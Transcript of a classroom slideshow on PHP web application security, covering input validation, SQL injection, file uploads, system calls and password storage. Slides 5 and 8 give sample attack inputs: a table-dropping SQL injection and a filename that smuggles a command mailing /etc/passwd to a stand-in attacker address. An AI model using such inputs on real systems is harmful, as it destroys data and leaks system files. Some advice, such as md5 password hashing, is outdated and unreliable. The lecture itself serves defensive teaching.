1 / 14

PHP Security

PHP Security. SecurityServer Issues Patches SettingsApplicationsProgrammer responsibilitiesHosted SolutionsFind a good host that has a strong reputation for protecting their servers, applying patches and good customer serviceEx. Blue Host, RackSpace, MediaTempleCheapist is never cheapAdap

kareem
Download Presentation

PHP Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

    1. PHP Security IS 1059

    2. PHP Security Security Server Issues Patches Settings Applications Programmer responsibilities Hosted Solutions Find a good host that has a strong reputation for protecting their servers, applying patches and good customer service Ex. Blue Host, RackSpace, MediaTemple Cheapist is never cheap Adapted from Securing PHP Web Applications by Ballard – Buy it!

    3. PHP Security Application developer in Pgh 50% of the applications he has designed have been hacked mostly due to user failure of installing patches and upgrades. Example: Using hidden fields to carry over data about username, product and price in a shopping cart. How would you protect? Why does the problem still exist?

    4. PHP Security Motivations for security breaches Honest mistakes in typing Boredom Challenge of outsmarting the programmer Curiosity Malicious Intent No application is too small to be attacked or destroyed

    5. PHP Security Ex: Program Small guestbook application Allows anonymous comment Allow users to enter name and comment logged in or not Account creation Upload small image Admin can view and delete accts Example: User writes the following comment: This is a great guestbook); drop table USERS; INSERT INTO comments VALUES (This is a great guestbook); drop table USERS;); or INSERT INTO comments VALUES ($_POST[‘comment’]); Server may complain about syntax but will execute Not difficult to guess what some names of tables are

    6. PHP Security User Input Blank Input Cause errors that confuse user or provide valuable hacker info Control Chars Non Alphanumeric – symbols Excessive long inputs – buffer overflow SQL Injection Code Injection Cross-Site Scripting

    7. PHP Security Build a system to handle errors Redirect user to another page Display a formatted error message Function error ($message) { Return ‘<font color=‘red’>$message</font>’; Test If ($_POST[‘err’]) { $html.=$_POST[‘err’]; Html.=‘<br>’; This code checks to see if user is coming back from an error page Code Function error ($message) { $formatted_error=‘formatted error message’; http_redirect(‘guestbook.php’, array(err=$formatted_error);

    8. PHP Security Stay away from system calls Exec() System() Example: You have a file upload system and user calls a file ;mail hacker@example.com < /etc/passwd and you pass this filename to the OS and issue command to mv $filename /home/guestbook/uploads System will throw a syntax error but continue to follow the command of emailing your password file

    9. PHP Security Test for unexpected Input isnumeric() Strip any HTML from User input striptags() If accepting html from users check it first to make sure it is safe htmlentities() htmlspecialchars() Defeat mail spammers Prevent users from sending emails to more than one person at a time Use regular expressions to test for commas or semicolons in to section of mail message

    10. PHP Security Buffer overflows User gives more info to the program than it can handle An area of memory overwrites with the code of the hacker Sanitize USER data Be careful of using RSS and remote DB’s Check data length of input, strlen is your friend Use mysql_escape_string function Ex: http://corpocrat.com/2009/07/28/filtering-escaping-post-data-from-injection-attacks/ Apply patches to your system – network admin role

    11. PHP Security Input Validation Last line of defense is limits on data by your DB Test for logical constraints Length, cap letters, numbers only Use regular expressions Well tested examples available for email, etc – don’t have to write your own Ex: http://devzone.zend.com/node/view/id/661 Files and Uploading Check for malicious files – only accept certain types of files Always use is_uploaded_file function when moving file from tmp to perm location Set appropriate file permissions on uploaded files Can upload an executable and if in web accessible directory then hacker is good to go

    12. PHP Security User Authentication Captcha Keep out the bots Scripts already written and can use for free Lost password Email to user Role based systems Give users roles in user table and check before they are allowed to perform an action Directory based authentication .htaccess file Many hosted sites may limit you on this

    13. PHP Security Storing Passwords Allow strong passwords avoid dictionary words http://phpsec.org/articles/2005/password-hashing.html Use password hashing and store hash not the password sha or md5 functions are available Ecommerce system Never store credit card info on your site always store on the provider!!!

    14. PHP Security Advanced topics in Security Session fixation Session hijacking Cross-site scripting Session poisoning Securing Apache Hardening php.ini Using test software to simulate attacks

More Related